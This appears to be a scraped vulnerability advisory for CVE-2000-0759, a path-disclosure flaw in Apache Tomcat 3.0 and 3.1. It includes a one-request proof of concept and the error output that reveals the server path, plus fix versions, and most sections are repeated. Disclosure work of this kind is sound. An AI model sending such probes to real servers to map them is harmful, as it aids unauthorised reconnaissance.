Apache Tomcat 3.1 Path Revealing Vulnerability
BID:1531
Info
Apache Tomcat 3.1 Path Revealing Vulnerability
| Bugtraq ID: | 1531 |
| Class: | Design Error |
| CVE: |
CVE-2000-0759 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 20 2000 12:00AM |
| Updated: | Jul 11 2009 02:56AM |
| Credit: | This vulnerability was posted to the Bugtraq mailing list on July 20, 2000 by ET LoWNOISE <[email protected]> |
| Vulnerable: |
Apache Tomcat 3.1 Apache Tomcat 3.0 Apache JSP 1.1 |
| Not Vulnerable: |
Apache Tomcat 3.1.1 |
Discussion
Apache Tomcat 3.1 Path Revealing Vulnerability
A vulnerability exists in the JSP portion of the Tomcat package, version 3.1, from the Apache Software Foundation. Upon hitting an nonexistent JSP file, too much information is presented by the server as part of the error message. This information may be useful to a would be attacker in conducting further attacks.
A vulnerability exists in the JSP portion of the Tomcat package, version 3.1, from the Apache Software Foundation. Upon hitting an nonexistent JSP file, too much information is presented by the server as part of the error message. This information may be useful to a would be attacker in conducting further attacks.
Exploit / POC
Apache Tomcat 3.1 Path Revealing Vulnerability
http://narco.guerrilla.sucks.co:8080/anything.jsp
Error: 404
Location: /anything.jsp
JSP file "/appsrv2/jakarta-tomcat/webapps/ROOT/anything.jsp" not found
http://narco.guerrilla.sucks.co:8080/anything.jsp
Error: 404
Location: /anything.jsp
JSP file "/appsrv2/jakarta-tomcat/webapps/ROOT/anything.jsp" not found
Solution / Fix
Apache Tomcat 3.1 Path Revealing Vulnerability
Solution:
This issue has been resolved in version 3.1.1 and later.
Apache Tomcat 3.0
Apache Tomcat 3.1
Solution:
This issue has been resolved in version 3.1.1 and later.
Apache Tomcat 3.0
-
Apache Software Foundation Jakarta Tomcat 3.3.1a
http://jakarta.apache.org/builds/jakarta-tomcat/release/v3.3.1a/
Apache Tomcat 3.1
-
Apache Software Foundation Jakarta Tomcat 3.3.1a
http://jakarta.apache.org/builds/jakarta-tomcat/release/v3.3.1a/
References
Apache Tomcat 3.1 Path Revealing Vulnerability
References:
References:
- Apache Software Foundation Homepage (Apache Software Foundation)
- Tomcat Homepage (Apache Software Foundation)